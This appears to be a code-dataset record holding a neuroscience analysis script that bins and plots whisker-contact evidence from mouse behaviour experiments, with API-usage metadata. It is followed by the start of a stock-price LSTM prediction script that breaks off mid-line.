pandas.read_pickle(os.path.join(\n params['logreg_dir'], 'reduced_model_results_sbrc', 'no_opto', reduced_model, \n 'big_normalizing_sigma'))\n\n# Remove redundant\nnormalizing_mu = normalizing_mu.xs(\n 'rewside', level='decode_label').rename('mu').copy()\nnormalizing_sigma = normalizing_sigma.xs(\n 'rewside', level='decode_label').rename('sigma').copy()\n\n\n## Extract the locations of each contact, to be weighted by weights\n# Extract contact presence and angle onto the columns, one row per contact\nstacked_contacts = ouf[\n ['anti_angle_max', 'anti_contact_count', 'contact_binarized', 'angle']\n ].stack('label')\n\n# Drop the rows that have neither anti- nor actual contact\nstacked_contacts = stacked_contacts.loc[\n (stacked_contacts['anti_contact_count'] != 0) |\n (stacked_contacts['contact_binarized'] != 0)\n ].copy()\n\n# Join on whisk location (this is where it will be plotted)\n# TODO: join on contact location, not peak location, but probably the same\nto_join = big_cycle_features[\n ['peak_tip_x', 'peak_tip_y']].stack('whisker')\nto_join.index = to_join.index.rename('label', level='whisker')\nstacked_contacts = stacked_contacts.join(\n to_join, on=['session', 'trial', 'cycle', 'label']).sort_index()\nassert not stacked_contacts.index.duplicated().any()\n\n\n## Apply the standardization to the non-raw features\n# Only standardize these\nstandardized_features = ['anti_angle_max', 'angle']\n\n# Extract and join on sigma and mu\nto_standardize = stacked_contacts[\n standardized_features].stack().rename('value').to_frame()\nto_standardize = to_standardize.join(\n normalizing_mu,\n on=['session', 'metric', 'label', 'analysis_bin']\n )\nto_standardize = to_standardize.join(\n normalizing_sigma,\n on=['session', 'metric', 'label', 'analysis_bin']\n )\nto_standardize['standardized'] = to_standardize['value'].sub(\n to_standardize['mu']).divide(to_standardize['sigma'])\n\n# Drop ones that go to infinity\nto_standardize = to_standardize.loc[\n ~np.isinf(to_standardize['standardized']) &\n ~to_standardize['standardized'].isnull() &\n (to_standardize['standardized'].abs() < 10)\n ]\n\n# Put back into stacked_contacts\n# This will insert nulls where standardized angle was messed up\nto_rejoin = to_standardize['standardized'].unstack('metric')\nstacked_contacts = stacked_contacts.drop(standardized_features, axis=1)\nstacked_contacts = stacked_contacts.join(to_rejoin)\n\n\n## Transform contact location into the warped space\nto_transform = stacked_contacts[['peak_tip_x', 'peak_tip_y']]\ntransformed_contacts = my.misc.transform(\n to_transform, transformation_df).rename(\n columns={'peak_tip_x': 'transformed_x', 'peak_tip_y': 'transformed_y'})\n\n\n## Calculate the evidence of each contact\n# Stack contacts again, so that each metric (e.g. angle) is a row\nto_weight = stacked_contacts[\n ['anti_contact_count', 'contact_binarized', 'angle', 'anti_angle_max']\n ].stack().rename('value')\n\n# Get decode_label alone on columns\nflattened_weights = use_weights.stack().stack().stack().unstack('decode_label')\n\n# Rename weights\nflattened_weights = flattened_weights.rename(\n columns={'choice': 'choice_weight', 'rewside': 'rewside_weight'})\n\n# Join the weights onto the contacts\njoined = to_weight.to_frame().join(\n flattened_weights, on=flattened_weights.index.names)\n#~ assert not joined.isnull().any().any()\nassert len(joined) == len(to_weight)\n\n# Shouldn't be any nulls because they would have been dropped by stacking\n#~ assert not joined.isnull().any().any()\n\n# Apply weight\njoined['choice_evidence'] = joined['value'] * joined['choice_weight']\njoined['rewside_evidence'] = joined['value'] * joined['rewside_weight']\nevidence = joined[['choice_evidence', 'rewside_evidence']].copy()\n\n# Sum over metric\nevidence = evidence.sum(\n level=[lev for lev in evidence.index.names if lev != 'metric']\n )\n\n\n## Concat data about contacts, their transformed position, and their evidence\ncontact_evidence = pandas.concat(\n [stacked_contacts, transformed_contacts, evidence], \n axis=1, sort=True, verify_integrity=True).sort_index(axis=1)\n\n\n## Bin the contacts spatially\n# How to bin\nbins_x = np.linspace(-300, 300, 26)\nbincenters_x = (bins_x[1:] + bins_x[:-1]) / 2.0\nbins_y = np.linspace(-200, 400, 26)\nbincenters_y = (bins_y[1:] + bins_y[:-1]) / 2.0\n\n# Histogram the points\ncontact_evidence['bin_x'] = pandas.cut(\n contact_evidence['transformed_x'],\n bins=bins_x,\n labels=False, right=True)\ncontact_evidence['bin_y'] = pandas.cut(\n contact_evidence['transformed_y'],\n bins=bins_y,\n labels=False, right=True)\n\n# Drop ones outside bins\n# TODO: check this doesn't happen too much\ncontact_evidence = contact_evidence.dropna(subset=['bin_x', 'bin_y'])\ncontact_evidence['bin_x'] = contact_evidence['bin_x'].astype(np.int)\ncontact_evidence['bin_y'] = contact_evidence['bin_y'].astype(np.int)\n\n# This is used to reindex various quantities below to evenly tile the frame\nfull_spatial_bincenter_midx = pandas.MultiIndex.from_product([\n pandas.Index(range(len(bincenters_x)), name='bin_x'),\n pandas.Index(range(len(bincenters_y)), name='bin_y'),\n ], names=['bin_x', 'bin_y'])\n\n\n## Rename label to whisker\ncontact_evidence.index = contact_evidence.index.rename('whisker', level='label')\n\n\n## Drop C0 for now\ncontact_evidence = contact_evidence.drop('C0', level='whisker')\n\n\n## Split the evidence by contact vs no-contact whisks\n# A contact occurred\nyes_contact_evidence = contact_evidence.loc[\n (contact_evidence['contact_binarized'] > 0) &\n (contact_evidence['anti_contact_count'] == 0)\n ]\n\n# No contact occurred\nnon_contact_evidence = contact_evidence.loc[\n (contact_evidence['contact_binarized'] == 0) &\n (contact_evidence['anti_contact_count'] > 0)\n ]\n\n# On ~1.5% of whisks some double pump happened where both a contact \n# and an anti-contact happened on the same whisker\n# Those are dropped\n\n# Add this as a level\ncontact_evidence = pandas.concat([\n yes_contact_evidence, non_contact_evidence],\n axis=0, sort=True, verify_integrity=True, keys=['yes', 'non'], \n names=['contact_typ'])\n\n\n## Aggregate the evidence by spatial bins\n# Mean evidence\ngobj = contact_evidence.groupby(\n ['contact_typ', 'task', 'mouse', 'whisker', 'bin_x', 'bin_y'])\naggregated_evidence_spatial = gobj[\n ['choice_evidence', 'rewside_evidence']].mean()\n\n# Count the number of whisks that went into this mean\nn_whisks = gobj.size().rename('n_whisks')\nassert n_whisks.sum() == len(contact_evidence)\naggregated_evidence_spatial = aggregated_evidence_spatial.join(n_whisks)\n\n# Calculate whisks per trial in each bin\n# This is more appropriate for comparing across conditions\naggregated_evidence_spatial['n_whisks_per_trial'] = (\n aggregated_evidence_spatial['n_whisks'].divide(\n n_trials_per_mouse)).reorder_levels(\n aggregated_evidence_spatial.index.names)\n\n# Also normalize this, so that it sums to 1 over all spatial bins\n# This is more appropriate for just looking at relative spatial distributions\nnormalizing_factor = aggregated_evidence_spatial['n_whisks'].sum(\n level=[lev for lev in aggregated_evidence_spatial.index.names \n if lev not in ['bin_x', 'bin_y']])\naggregated_evidence_spatial['norm_whisks_per_trial'] = (\n aggregated_evidence_spatial['n_whisks'].divide(\n normalizing_factor).reorder_levels(\n aggregated_evidence_spatial.index.names)\n )\n\n\n## Aggregate the evidence by spatiotemporal bins\n## TODO: normalize like above\n# Mean evidence\ngobj = contact_evidence.groupby(\n ['contact_typ', 'task', 'mouse', 'bin', 'whisker', 'bin_x', 'bin_y'])\naggregated_evidence_spatiotemporal = gobj[\n ['choice_evidence', 'rewside_evidence']].mean()\n\n# Sum occupancy\noccupancy = gobj.size().rename('n_contacts')\nassert occupancy.sum() == len(contact_evidence)\naggregated_evidence_spatiotemporal = aggregated_evidence_spatiotemporal.join(occupancy)\n\n# Normalize the occupancy to sum to 1 over the spatial bins\ncontacts_per_bin = aggregated_evidence_spatiotemporal['n_contacts'].sum(\n level=[lev for lev in aggregated_evidence_spatiotemporal.index.names \n if lev not in ['bin_x', 'bin_y']])\naggregated_evidence_spatiotemporal['occupancy'] = aggregated_evidence_spatiotemporal['n_contacts'].divide(\n contacts_per_bin).reorder_levels(aggregated_evidence_spatiotemporal.index.names)\n\n# Replace bin with bincenter\nidxdf = aggregated_evidence_spatiotemporal.index.to_frame().reset_index(drop=True)\nidxdf['frame_bin'] = idxdf['bin'].map(\n pandas.Series(bin_centers_frames, index=range(len(bin_centers_frames))))\naggregated_evidence_spatiotemporal.index = pandas.MultiIndex.from_frame(\n idxdf[['contact_typ', 'task', 'mouse', 'frame_bin', \n 'whisker', 'bin_x', 'bin_y']])\naggregated_evidence_spatiotemporal = aggregated_evidence_spatiotemporal.sort_index()\n\n\n## Plot flags\nPLOT_EDGE_SUMMARY_ONLY = True\nPLOT_OCCUPANCY_DISCONLY = True\nPLOT_EVIDENCE_DISCONLY_REWSIDEONLY = True\nPLOT_EVIDENCE_DISCONLY_CHOICEONLY = True\n\n\n## Plot\nif PLOT_EDGE_SUMMARY_ONLY:\n ## Simple single axis with edge summary, for demonstration\n # Figure handle\n f, ax = plt.subplots(figsize=(3, 2.5))\n f.subplots_adjust(left=0, right=1, bottom=0, top=1)\n \n # Plot edge summary\n extras.plot_warped_edge_summary(\n ax, cv_ces=cv_ces, cc_ces=cc_ces, typ='color_by_stimulus')\n\n # Follicle\n ax.plot(\n [transformed_mean_follicle['x'].values.mean()],\n [transformed_mean_follicle['y'].values.mean()],\n marker='x', color='k', ls='none')\n\n # Pretty\n ax.axis('image')\n ax.set_xlim((-300, 300))\n ax.set_ylim((300, -200))\n ax.set_xticks([])\n ax.set_yticks([]) \n\n # Scale bar\n # 2.7mm = 60px, so 45um per px, or 222.2px per 10mm\n ax.plot([-200, -200+111.1], [275, 275], 'k-', lw=.8)\n ax.text(-200 + 55.55, 275, '5 mm', ha='center', va='bottom', size=12)\n \n # Save\n f.savefig('PLOT_EDGE_SUMMARY_ONLY.svg')\n f.savefig('PLOT_EDGE_SUMMARY_ONLY.png', dpi=300)\n\n\nif PLOT_OCCUPANCY_DISCONLY:\n ## Parameters\n # Metric to plot\n metric_topl = 'norm_whisks_per_trial'\n\n # Iterate over whisk type (rows of figure)\n whisk_typ_l = ['yes', 'non']\n \n # Do only discrimination\n task = 'discrimination'\n \n # Binning\n mouse_thresh = 4\n nwpt_thresh = .02\n \n # Plotting\n edge_alpha = .3\n occupancy_vmin = 0\n occupancy_vmax = .03\n \n \n ## Aggregrate\n # Slice by task and group by whisk type\n figure_gobj = aggregated_evidence_spatial.xs(\n task, level='task').groupby(\n 'contact_typ')\n\n \n ## Make handles\n f, axa = plt.subplots(\n len(whisk_typ_l), 1,\n figsize=(3, 6.5), sharex=True, sharey=True)\n \n f.subplots_adjust(left=0, right=1, bottom=0, top=.925, hspace=.3)\n \n \n ## Iterate over whisk types (rows)\n for whisk_typ, sub_ae in figure_gobj:\n \n ## Slice\n # Droplevel\n sub_ae = sub_ae.droplevel('contact_typ')\n\n # Slice data (evidence)\n axis_data = sub_ae[metric_topl]\n\n # Get ax\n ax = axa[\n whisk_typ_l.index(whisk_typ)\n ]\n\n # Set title\n if whisk_typ == 'yes':\n ax.set_title('whisks with contact\\n(location)')\n \n elif whisk_typ == 'non':\n ax.set_title('whisks without contact\\n(location)')\n \n\n ## Spatialize occupancy\n # Mean over mice, separately by whisker\n spatialized = axis_data.mean(\n level=['whisker', 'bin_x', 'bin_y'])\n \n\n # Combine to rgb\n occupancy_rgb = extras.combine_whisker_occupancy_to_rgb(\n spatialized, full_spatial_bincenter_midx, \n bins_x, bins_y,\n x_index=all_ces.columns, y_index=all_ces.index,\n vmin=occupancy_vmin, vmax=occupancy_vmax)\n \n\n ## Calculate edge_data\n edge_data = all_ces.values\n\n # Mask the edge_data, so that it has no effect where it is null\n # Actually, this just avoids warnings about null in normalizing\n masked_edge_data = np.ma.masked_array(\n edge_data, np.isnan(edge_data))\n\n # Normalize edge data to (0, 1) and colormap in black and white\n # This replaces masked data with the colormap's \"bad value\"\n edge_norm = matplotlib.colors.Normalize(vmin=0, vmax=1)\n edge_data_rgba = plt.cm.gray_r(edge_norm(masked_edge_data))\n\n \n ## Blend occupancy_data and edge_data\n blended_rgba = my.plot.alpha_blend_with_mask(\n edge_data_rgba, \n occupancy_rgb, \n edge_alpha,\n masked_edge_data.mask,\n )\n\n \n ## Plot\n im = my.plot.imshow(\n blended_rgba, ax=ax, \n x=all_ces.columns.values, y=all_ces.index.values)\n \n\n ## Pretty\n # Plot follicle and ellipses\n extras.plot_follicle_and_ellipses(\n ax, transformed_mean_follicle, label_ellipses=True)\n \n # Limits\n extras.consistent_limits(ax)\n\n\n f.savefig('PLOT_OCCUPANCY_DISCONLY.svg')\n f.savefig('PLOT_OCCUPANCY_DISCONLY.png', dpi=300) \n\n\nif PLOT_EVIDENCE_DISCONLY_REWSIDEONLY:\n ## Parameters\n # Metric to plot\n metric_topl = 'rewside_evidence'\n\n # Iterate over whisk type (rows of figure)\n whisk_typ_l = ['yes', 'non']\n \n # Do only discrimination\n task = 'discrimination'\n \n # Binning\n mouse_thresh = 4\n nwpt_thresh = .02\n \n # Plotting\n edge_alpha = .3\n evidence_vmin = -1\n evidence_vmax = 1\n \n \n ## Aggregrate\n # Slice by task and group by whisk type\n figure_gobj = aggregated_evidence_spatial.xs(\n task, level='task').groupby(\n 'contact_typ')\n \n \n ## Make handles\n f, axa = plt.subplots(\n len(whisk_typ_l), 1,\n figsize=(4.25, 6.5), sharex=True, sharey=True)\n \n f.subplots_adjust(left=0, right=.7, bottom=0, top=.925, hspace=.3)\n\n # Axis for colorbar\n cb_ax = f.add_axes((.77, .27, .03, .4))\n cb = f.colorbar(\n matplotlib.cm.ScalarMappable(\n matplotlib.colors.Normalize(vmin=evidence_vmin, vmax=evidence_vmax),\n cmap=plt.cm.RdBu_r), cax=cb_ax)\n cb.set_ticks((evidence_vmin, 0, evidence_vmax))\n cb.ax.tick_params(labelsize=12)\n \n \n ## Iterate over whisk types (rows)\n for whisk_typ, sub_ae in figure_gobj:\n \n ## Slice\n # Droplevel\n sub_ae = sub_ae.droplevel('contact_typ')\n\n # Slice data (evidence)\n axis_data = sub_ae[metric_topl]\n\n # Get ax\n ax = axa[\n whisk_typ_l.index(whisk_typ)\n ]\n\n # Set title\n if whisk_typ == 'yes':\n ax.set_title('whisks with contact\\n(evidence)')\n \n elif whisk_typ == 'non':\n ax.set_title('whisks without contact\\n(evidence)')\n \n\n ## Identify spatial bins with enough whisks to be worth plotting\n keep_mask = extras.threshold_bins_by_n_whisks(\n sub_ae, mouse_thresh=mouse_thresh, nwpt_thresh=nwpt_thresh)\n \n \n ## Spatialize evidence\n evidence_data = extras.spatialize_evidence(\n axis_data, keep_mask, full_spatial_bincenter_midx,\n bins_x, bins_y,\n x_index=all_ces.columns, y_index=all_ces.index,\n )\n\n # Use only raw data\n evidence_data = evidence_data.values\n\n\n ## Calculate edge_data\n edge_data = all_ces.values\n\n # Mask the edge_data, so that it has no effect where it is null\n # Actually, this just avoids warnings about null in normalizing\n masked_edge_data = np.ma.masked_array(\n edge_data, np.isnan(edge_data))\n\n\n ## Normalize and blend plot\n extras.normalize_and_blend_plot(\n masked_edge_data, evidence_data, edge_alpha=edge_alpha, ax=ax,\n evidence_vmin=evidence_vmin, evidence_vmax=evidence_vmax,\n x_index=all_ces.columns.values, y_index=all_ces.index.values,\n )\n\n\n ## Pretty\n # Plot follicle and ellipses\n extras.plot_follicle_and_ellipses(ax, transformed_mean_follicle)\n \n # Limits\n extras.consistent_limits(ax)\n\n \n ## Save\n f.savefig('PLOT_EVIDENCE_DISCONLY_REWSIDEONLY.svg')\n f.savefig('PLOT_EVIDENCE_DISCONLY_REWSIDEONLY.png', dpi=300) \n\n\nif PLOT_EVIDENCE_DISCONLY_CHOICEONLY:\n ## Parameters\n # Metric to plot\n metric_topl = 'choice_evidence'\n\n # Iterate over whisk type (rows of figure)\n whisk_typ_l = ['yes', 'non']\n \n # Do only discrimination\n task = 'discrimination'\n \n # Binning\n mouse_thresh = 4\n nwpt_thresh = .02\n \n # Plotting\n edge_alpha = .3\n evidence_vmin = -.5\n evidence_vmax = .5\n \n \n ## Aggregrate\n # Slice by task and group by whisk type\n figure_gobj = aggregated_evidence_spatial.xs(\n task, level='task').groupby(\n 'contact_typ')\n \n \n ## Make handles\n f, axa = plt.subplots(\n len(whisk_typ_l), 1,\n figsize=(4.25, 6.5), sharex=True, sharey=True)\n \n f.subplots_adjust(left=0, right=.7, bottom=0, top=.925, hspace=.3)\n \n # Axis for colorbar\n cb_ax = f.add_axes((.77, .27, .03, .4))\n cb = f.colorbar(\n matplotlib.cm.ScalarMappable(\n matplotlib.colors.Normalize(vmin=evidence_vmin, vmax=evidence_vmax),\n cmap=plt.cm.RdBu_r), cax=cb_ax)\n cb.set_ticks((evidence_vmin, 0, evidence_vmax))\n cb.ax.tick_params(labelsize=12)\n \n \n ## Iterate over whisk types (rows)\n for whisk_typ, sub_ae in figure_gobj:\n \n ## Slice\n # Droplevel\n sub_ae = sub_ae.droplevel('contact_typ')\n\n # Slice data (evidence)\n axis_data = sub_ae[metric_topl]\n\n # Get ax\n ax = axa[\n whisk_typ_l.index(whisk_typ)\n ]\n \n # Set title\n if whisk_typ == 'yes':\n ax.set_title('whisks with contact\\n(evidence)')\n \n elif whisk_typ == 'non':\n ax.set_title('whisks without contact\\n(evidence)')\n\n\n ## Identify spatial bins with enough whisks to be worth plotting\n keep_mask = extras.threshold_bins_by_n_whisks(\n sub_ae, mouse_thresh=mouse_thresh, nwpt_thresh=nwpt_thresh)\n \n \n ## Spatialize evidence\n evidence_data = extras.spatialize_evidence(\n axis_data, keep_mask, full_spatial_bincenter_midx,\n bins_x, bins_y,\n x_index=all_ces.columns, y_index=all_ces.index,\n )\n\n # Use only raw data\n evidence_data = evidence_data.values\n\n\n ## Calculate edge_data\n edge_data = all_ces.values\n\n # Mask the edge_data, so that it has no effect where it is null\n # Actually, this just avoids warnings about null in normalizing\n masked_edge_data = np.ma.masked_array(\n edge_data, np.isnan(edge_data))\n\n\n ## Normalize and blend plot\n extras.normalize_and_blend_plot(\n masked_edge_data, evidence_data, edge_alpha=edge_alpha, ax=ax,\n evidence_vmin=evidence_vmin, evidence_vmax=evidence_vmax,\n x_index=all_ces.columns.values, y_index=all_ces.index.values,\n )\n\n\n ## Pretty\n # Plot follicle and ellipses\n extras.plot_follicle_and_ellipses(ax, transformed_mean_follicle)\n \n # Limits\n extras.consistent_limits(ax)\n\n \n \n \n ## Save\n f.savefig('PLOT_EVIDENCE_DISCONLY_CHOICEONLY.svg')\n f.savefig('PLOT_EVIDENCE_DISCONLY_CHOICEONLY.png', dpi=300) \n\n \nplt.show()", "repo_name": "cxrodgers/Rodgers2021", "sub_path": "04_logreg_vis/main3b.py", "file_name": "main3b.py", "file_ext": "py", "file_size_in_byte": 23786, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "my.plot.plot.manuscript_defaults", "line_number": 37, "usage_type": "call"}, {"api_name": "my.plot.plot", "line_number": 37, "usage_type": "attribute"}, {"api_name": "my.plot", "line_number": 37, "usage_type": "name"}, {"api_name": "my.plot.plot.font_embed", "line_number": 38, "usage_type": "call"}, {"api_name": "my.plot.plot", "line_number": 38, "usage_type": "attribute"}, {"api_name": "my.plot", "line_number": 38, "usage_type": "name"}, {"api_name": "json.load", "line_number": 43, "usage_type": "call"}, {"api_name": "my.plot.dataload.load_session_metadata", "line_number": 47, "usage_type": "call"}, {"api_name": "my.plot.dataload", "line_number": 47, "usage_type": "attribute"}, {"api_name": "my.plot", "line_number": 47, "usage_type": "name"}, {"api_name": "pandas.read_pickle", "line_number": 48, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 48, "usage_type": "call"}, {"api_name": "os.path", "line_number": 48, "usage_type": "attribute"}, {"api_name": "my.plot.misc.insert_mouse_and_task_levels", "line_number": 51, "usage_type": "call"}, {"api_name": "my.plot.misc", "line_number": 51, "usage_type": "attribute"}, {"api_name": "my.plot", "line_number": 51, "usage_type": "name"}, {"api_name": "pandas.read_pickle", "line_number": 62, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 63, "usage_type": "call"}, {"api_name": "os.path", "line_number": 63, "usage_type": "attribute"}, {"api_name": "pandas.read_pickle", "line_number": 64, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 65, "usage_type": "call"}, {"api_name": "os.path", "line_number": 65, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 73, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 74, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 75, "usage_type": "attribute"}, {"api_name": "pandas.read_pickle", "line_number": 79, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 80, "usage_type": "call"}, {"api_name": "os.path", "line_number": 80, "usage_type": "attribute"}, {"api_name": "pandas.read_pickle", "line_number": 81, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 82, "usage_type": "call"}, {"api_name": "os.path", "line_number": 82, "usage_type": "attribute"}, {"api_name": "pandas.read_pickle", "line_number": 85, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 86, "usage_type": "call"}, {"api_name": "os.path", "line_number": 86, "usage_type": "attribute"}, {"api_name": "my.plot.misc.transform", "line_number": 89, "usage_type": "call"}, {"api_name": "my.plot.misc", "line_number": 89, "usage_type": "attribute"}, {"api_name": "my.plot", "line_number": 89, "usage_type": "name"}, {"api_name": "pandas.read_pickle", "line_number": 95, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 95, "usage_type": "call"}, {"api_name": "os.path", "line_number": 95, "usage_type": "attribute"}, {"api_name": "my.plot.misc.insert_mouse_and_task_levels", "line_number": 99, "usage_type": "call"}, {"api_name": "my.plot.misc", "line_number": 99, "usage_type": "attribute"}, {"api_name": "my.plot", "line_number": 99, "usage_type": "name"}, {"api_name": "numpy.linspace", "line_number": 103, "usage_type": "call"}, {"api_name": "pandas.cut", "line_number": 105, "usage_type": "call"}, {"api_name": "numpy.int", "line_number": 112, "usage_type": "attribute"}, {"api_name": "pandas.MultiIndex.from_frame", "line_number": 113, "usage_type": "call"}, {"api_name": "pandas.MultiIndex", "line_number": 113, "usage_type": "attribute"}, {"api_name": "pandas.read_pickle", "line_number": 127, "usage_type": "call"}, {"api_name": "pandas.read_pickle", "line_number": 136, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 136, "usage_type": "call"}, {"api_name": "os.path", "line_number": 136, "usage_type": "attribute"}, {"api_name": "pandas.read_pickle", "line_number": 139, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 139, "usage_type": "call"}, {"api_name": "os.path", "line_number": 139, "usage_type": "attribute"}, {"api_name": "numpy.isinf", "line_number": 192, "usage_type": "call"}, {"api_name": "my.plot.misc.transform", "line_number": 206, "usage_type": "call"}, {"api_name": "my.plot.misc", "line_number": 206, "usage_type": "attribute"}, {"api_name": "my.plot", "line_number": 206, "usage_type": "name"}, {"api_name": "pandas.concat", "line_number": 245, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 252, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 254, "usage_type": "call"}, {"api_name": "pandas.cut", "line_number": 258, "usage_type": "call"}, {"api_name": "pandas.cut", "line_number": 262, "usage_type": "call"}, {"api_name": "numpy.int", "line_number": 270, "usage_type": "attribute"}, {"api_name": "numpy.int", "line_number": 271, "usage_type": "attribute"}, {"api_name": "pandas.MultiIndex.from_product", "line_number": 274, "usage_type": "call"}, {"api_name": "pandas.MultiIndex", "line_number": 274, "usage_type": "attribute"}, {"api_name": "pandas.Index", "line_number": 275, "usage_type": "call"}, {"api_name": "pandas.Index", "line_number": 276, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 306, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 366, "usage_type": "call"}, {"api_name": "pandas.MultiIndex.from_frame", "line_number": 367, "usage_type": "call"}, {"api_name": "pandas.MultiIndex", "line_number": 367, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 384, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 384, "usage_type": "name"}, {"api_name": "extras.plot_warped_edge_summary", "line_number": 388, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 443, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 443, "usage_type": "name"}, {"api_name": "extras.combine_whisker_occupancy_to_rgb", "line_number": 480, "usage_type": "call"}, {"api_name": "numpy.ma.masked_array", "line_number": 492, "usage_type": "call"}, {"api_name": "numpy.ma", "line_number": 492, "usage_type": "attribute"}, {"api_name": "numpy.isnan", "line_number": 493, "usage_type": "call"}, {"api_name": "matplotlib.colors.Normalize", "line_number": 497, "usage_type": "call"}, {"api_name": "matplotlib.colors", "line_number": 497, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.cm.gray_r", "line_number": 498, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 498, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 498, "usage_type": "name"}, {"api_name": "my.plot.plot.alpha_blend_with_mask", "line_number": 502, "usage_type": "call"}, {"api_name": "my.plot.plot", "line_number": 502, "usage_type": "attribute"}, {"api_name": "my.plot", "line_number": 502, "usage_type": "name"}, {"api_name": "my.plot.plot.imshow", "line_number": 511, "usage_type": "call"}, {"api_name": "my.plot.plot", "line_number": 511, "usage_type": "attribute"}, {"api_name": "my.plot", "line_number": 511, "usage_type": "name"}, {"api_name": "extras.plot_follicle_and_ellipses", "line_number": 518, "usage_type": "call"}, {"api_name": "extras.consistent_limits", "line_number": 522, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 558, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 558, "usage_type": "name"}, {"api_name": "matplotlib.cm.ScalarMappable", "line_number": 567, "usage_type": "call"}, {"api_name": "matplotlib.cm", "line_number": 567, "usage_type": "attribute"}, {"api_name": "matplotlib.colors.Normalize", "line_number": 568, "usage_type": "call"}, {"api_name": "matplotlib.colors", "line_number": 568, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 569, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 569, "usage_type": "name"}, {"api_name": "extras.threshold_bins_by_n_whisks", "line_number": 598, "usage_type": "call"}, {"api_name": "extras.spatialize_evidence", "line_number": 603, "usage_type": "call"}, {"api_name": "numpy.ma.masked_array", "line_number": 618, "usage_type": "call"}, {"api_name": "numpy.ma", "line_number": 618, "usage_type": "attribute"}, {"api_name": "numpy.isnan", "line_number": 619, "usage_type": "call"}, {"api_name": "extras.normalize_and_blend_plot", "line_number": 623, "usage_type": "call"}, {"api_name": "extras.plot_follicle_and_ellipses", "line_number": 632, "usage_type": "call"}, {"api_name": "extras.consistent_limits", "line_number": 635, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 672, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 672, "usage_type": "name"}, {"api_name": "matplotlib.cm.ScalarMappable", "line_number": 681, "usage_type": "call"}, {"api_name": "matplotlib.cm", "line_number": 681, "usage_type": "attribute"}, {"api_name": "matplotlib.colors.Normalize", "line_number": 682, "usage_type": "call"}, {"api_name": "matplotlib.colors", "line_number": 682, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 683, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 683, "usage_type": "name"}, {"api_name": "extras.threshold_bins_by_n_whisks", "line_number": 712, "usage_type": "call"}, {"api_name": "extras.spatialize_evidence", "line_number": 717, "usage_type": "call"}, {"api_name": "numpy.ma.masked_array", "line_number": 732, "usage_type": "call"}, {"api_name": "numpy.ma", "line_number": 732, "usage_type": "attribute"}, {"api_name": "numpy.isnan", "line_number": 733, "usage_type": "call"}, {"api_name": "extras.normalize_and_blend_plot", "line_number": 737, "usage_type": "call"}, {"api_name": "extras.plot_follicle_and_ellipses", "line_number": 746, "usage_type": "call"}, {"api_name": "extras.consistent_limits", "line_number": 749, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 759, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 759, "usage_type": "name"}]}
+{"seq_id": "24882022462", "text": "import pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport math\nimport DataPreProcessor\nimport sys\nimport os\nimport csv\nimport tensorflow\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.metrics import mean_squared_error\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense, Activation\nfrom tensorflow.keras.layers import LSTM\n\npath = \"Data\"\ndirectory = os.fsencode(path)\ndirs = os.listdir(path)\n\nMatcher=pd.read_csv(\"Symbol_Piotroski1.csv\")\n\nTicker=list(Matcher['SYMBOL'])\n\nresult = []\n\nfor file in dirs:\n if file.split('.')[0] in Ticker:\n\n np.random.seed(7)\n\n current_file = \"Data/\" + str(file)\n dataset = pd.read_csv(current_file, usecols=[1,2,3,4])\n dataset = dataset.reindex(index = dataset.index[::-1])\n\n obsolete = np.arange(1, len(dataset) +1, 1)\n\n OHLC_avg = dataset.mean(axis=1)\n OHLC_avg_copy = dataset.mean(axis=1)\n HLC_avg = dataset[['High', 'Low', 'Close']].mean(axis=1)\n close_val = dataset[['Close']]\n\n plt.plot(obsolete, OHLC_avg, 'r', label='OHLC_avg')\n plt.plot(obsolete, HLC_avg, 'b', label='HLC_avg')\n plt.plot(obsolete, close_val, 'g', label='Closing Price')\n plt.legend(loc = 'upper right')\n plt.show()\n\n OHLC_avg = np.reshape(OHLC_avg.values, (len(OHLC_avg),1))\n scaler = MinMaxScaler(feature_range=(0,1))\n OHLC_avg = scaler.fit_transform(OHLC_avg)\n\n train_OHLC = int(len(OHLC_avg) * .75)\n test_OHLC = len(OHLC_avg) - train_OHLC\n train_OHLC, test_OHLC = OHLC_avg[0:train_OHLC,:], OHLC_avg[train_OHLC:len(OHLC_avg),:]\n\n trainX, trainY = DataPreProcessor.new_dataset(train_OHLC,5)\n testX, testY = DataPreProcessor.new_dataset(test_OHLC, 